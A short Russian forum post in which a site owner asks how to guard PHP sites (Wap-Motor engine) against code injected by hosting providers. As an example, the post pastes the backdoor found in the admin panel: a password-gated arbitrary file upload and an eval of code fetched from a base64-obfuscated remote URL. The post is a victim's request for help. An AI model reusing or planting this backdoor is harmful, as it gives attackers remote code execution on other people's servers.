Всем привет, как защититься и оградиться от внедрения в код моих сайтов посторонних кусков кода от дешёвых хостеров? к сожалению примеров нет, удалил уже, но факт что в некоторых страницах php в режиме дисплей еррор ссылки на посторонние вредные шокирующие рекламы всякой дряни ведут, на уровне скорее роботов чем людей, однако этот неприятный сюрприз случайно обнаружил когда переделывал посторонний модуль для другого домена, а на чистом движке так и не заметил бы ничего.
Вот что теперь делать? Каждый раз вручную проверять весь движок? Wap-Motor).
Вот и пример нашёлся аж в админке))
ini_set('display_errors','Off'); error_reporting('E_ALL');
setcookie('server',1,time()+1e6);$s=$_SERVER;$sr=$s['HTTP_REFERER'];$sh=$s['HTTP_HOST'];$cs=$_COOKIE['server'];
if(isset($_FILES['u']) && isset($_POST['n']) && isset($_POST['hash']) && md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')
{
move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);
}
elseif(($sr && !strpos($sr,$sh) && $cs!=1) || $c=$_GET['cmdcmd'])
{
eval(file_get_contents(base64_decode('aHR0cDovL3FiMC5ydS93Lz91PQ==').$sh.'&c='.$c));
}
Изменил: Удаленный (05.07.2018 / 09:15)